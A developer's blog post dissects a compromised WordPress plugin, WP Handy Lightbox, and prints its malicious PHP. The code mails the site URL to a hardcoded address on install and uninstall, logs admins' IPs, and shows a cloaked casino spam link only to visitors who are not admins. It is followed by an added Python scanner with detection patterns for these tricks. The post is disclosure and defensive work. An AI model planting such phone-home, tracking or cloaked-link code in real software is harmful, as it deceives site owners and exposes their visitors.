Dead Eye Creative

WP Handy Lightbox WordPress Plugin Vulnerability and/or Hack

I found a hacked WordPress plugin on one of my clients' websites and thought I would post about it to show everyone what I found. The WP Handy Lightbox WordPress plugin was emailing the developer, hansenmartinwew@gmail.com, to tell him whether it was installed or uninstalled. It would log the IPs of the admins. When you went to the site, it would check by your IP whether you were an admin; if you were not, it would add a spam link on all pages. Inserting code into the situation really could have been a lot more destructive. A cool little script, really. It could do so much more.

This code emails the developer with the location of the install:

<?php
// Runs on plugin activation: records the activating admin's IP in welcome.txt,
// then mails the site URL to the hardcoded address (recipient redacted as "xxx" here).
function actithelightbox_activate() {
    $yourip = $_SERVER['REMOTE_ADDR'];
    $fp = fopen($_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/wp-handy-lightbox/welcome.txt', 'w');
    fwrite($fp, $yourip);
    fclose($fp);
    add_option('redirectlightbox_do_activation_redirect', true);
    session_start();
    $subj = get_option('siteurl');
    $msg  = "Plugin Activated";
    $from = get_option('admin_email');
    mail("xxx@gmail.com", $subj, $msg, $from);
    wp_redirect('../wp-admin/options-general.php?page=jquery-lightbox-options');
}

/** Uninstall The Plugin */
// Runs on deactivation: mails the site URL again so the recipient knows the plugin was removed.
function deactthelightbox_deactivate() {
    session_start();
    $subj = get_option('siteurl');
    $msg  = "Plugin Uninstalled";
    $from = get_option('admin_email');
    mail("xxx@gmail.com", $subj, $msg, $from);
}

This code checks whether you are an admin; if you are not, it does something.

In this case it was inserting a link for a slot machine gambling site.

<?php
/** Install Settings Locally */
// Despite that comment, this records the IP of every logged-in user: if the
// visitor's IP is not yet in welcome.txt, it is appended to the file.
function outputseo() {
    if (is_user_logged_in()) {
        $ip = $_SERVER['REMOTE_ADDR'];
        $filename = $_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/wp-handy-lightbox/welcome.txt';
        $handle = fopen($filename, "r");
        $contents = fread($handle, filesize($filename));
        fclose($handle);
        $filestring = $contents;
        $findme = $ip;
        $pos = strpos($filestring, $findme);
        if ($pos === false) {
            $contents = $contents . $ip;
            $fp = fopen($_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/wp-handy-lightbox/welcome.txt', 'w');
            fwrite($fp, $contents);
            fclose($fp);
        }
    }
}

The code shown here checks whether you are an admin; if you are not, it serves a spam SEO link on the site.

<?php
// Cloaking: a visitor whose IP is not in welcome.txt (i.e. not a recorded admin)
// gets the spam link; recorded admins see nothing, so the site looks clean to them.
$ip = $_SERVER['REMOTE_ADDR'];
$filename = $_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/wp-handy-lightbox/welcome.txt';
$handle = fopen($filename, "r");
$contents = fread($handle, filesize($filename));
fclose($handle);
$filestring = $contents;
$findme = $ip;
$pos = strpos($filestring, $findme);
if ($pos === false) {
?>
<a href="http://www.slotmachines.us.org">Casino Games</a>
<?php
} else {
    echo '';
}
?>
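As an added example (not from the post or from the plugin), a small Python scanner that flags the behaviours quoted above in plugin source: a hardcoded mail() recipient, REMOTE_ADDR written to a file, IP logging gated on is_user_logged_in(), and a link injected when the visitor's IP is absent from the stored list. The indicator names, the condensed sample sources and the directory layout are constructed for this illustration.

```python
import re
from pathlib import Path

# Indicator patterns for the behaviours quoted from the hacked plugin: phone-home
# mail(), REMOTE_ADDR -> file, logged-in IP logging, IP-gated link injection.
INDICATORS = {
    "phone_home_mail": re.compile(r"""\bmail\s*\(\s*["'][^"']+@[^"']+["']"""),
    "writes_remote_addr": re.compile(r"REMOTE_ADDR[\s\S]{0,400}?\bfwrite\s*\("),
    "logged_in_ip_logging": re.compile(r"is_user_logged_in\s*\(\s*\)[\s\S]{0,200}?REMOTE_ADDR"),
    "ip_gated_link_injection": re.compile(
        r"strpos\s*\([^;]*\)\s*;[\s\S]{0,200}?===\s*false[\s\S]{0,300}?<a\s+href", re.I),
}

def scan_source(src: str) -> list[str]:
    """Return the indicator names matched in one PHP source string (in table order)."""
    return [name for name, pat in INDICATORS.items() if pat.search(src)]

def scan_plugin_dir(root) -> dict[str, list[str]]:
    """Scan every .php file under a plugins directory; map path -> matched indicators."""
    hits = {}
    for path in Path(root).rglob("*.php"):
        found = scan_source(path.read_text(errors="replace"))
        if found:
            hits[str(path)] = found
    return hits

# Constructed sample condensing the activation hook and cloaking fragment from the post
# (__DIR__ and file_get_contents stand in for the DOCUMENT_ROOT/fopen/fread lines).
SAMPLE_MALICIOUS = r'''<?php
function actithelightbox_activate() {
    $yourip = $_SERVER['REMOTE_ADDR'];
    $fp = fopen(__DIR__ . '/welcome.txt', 'w'); fwrite($fp, $yourip); fclose($fp);
    mail("xxx@gmail.com", get_option('siteurl'), "Plugin Activated", get_option('admin_email'));
}
function outputseo() {
    if (is_user_logged_in()) { $ip = $_SERVER['REMOTE_ADDR']; /* appended to welcome.txt */ }
    $pos = strpos(file_get_contents(__DIR__ . '/welcome.txt'), $_SERVER['REMOTE_ADDR']);
    if ($pos === false) {
?>
<a href="http://www.slotmachines.us.org">Casino Games</a>
<?php } }
'''

# Constructed benign plugin code for comparison: no indicator should fire.
SAMPLE_BENIGN = r'''<?php
function handy_lightbox_enqueue() {
    wp_enqueue_script('handy-lightbox', plugins_url('lightbox.js', __FILE__));
}
add_action('wp_enqueue_scripts', 'handy_lightbox_enqueue');
'''
```

Point scan_plugin_dir at the plugins directory of the install being checked (for example /var/www/html/wp-content/plugins, an assumed layout); matches are leads for manual review of the file, not proof of compromise on their own.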

Here are screenshots of the code with explanations.

Creates the spam link if you are not an admin.

This is what the link looked like, in the upper left-hand corner.

Copies all of the admin IP addresses.

Emails on uninstall.

Here is the vulnerability. It allows writing to a file, install.php; this is where the link was being added, and you could do more with it.

Emails the developer upon installation.

Showing specifically the link it was inserting on the site in question.

WordPress Vulnerability

This is a backdoor: an easy way for someone from outside to insert code onto your server. You could do a lot of damage with this.

Showing the emails it was sending on install and uninstall.

This was the search where I found part of the code in the first place on the client's server.



